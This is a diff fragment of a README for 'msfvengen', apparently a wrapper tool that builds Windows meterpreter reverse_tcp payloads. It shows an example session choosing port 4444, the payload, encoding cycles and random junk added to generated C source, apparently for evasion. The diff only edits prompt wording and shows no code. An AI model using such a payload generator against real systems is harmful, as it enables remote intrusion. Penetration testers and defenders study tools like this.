lonalore/msfvengen/README.md

     > 4444
     We will be using the windows/meterpreter/reverse_X payloads.
 Which would you like to use?
     > windows/meterpreter/reverse_tcp
     How many cycles we encode our shellcode?
+(1-20)
     > 1
-    Number of random seed to add some junk to the resulting C code source file:
+    Number of random seed to add some junk to the resulting C code source file (1-10000):
     > 1

     Attempting to clean the ShellCode directory out...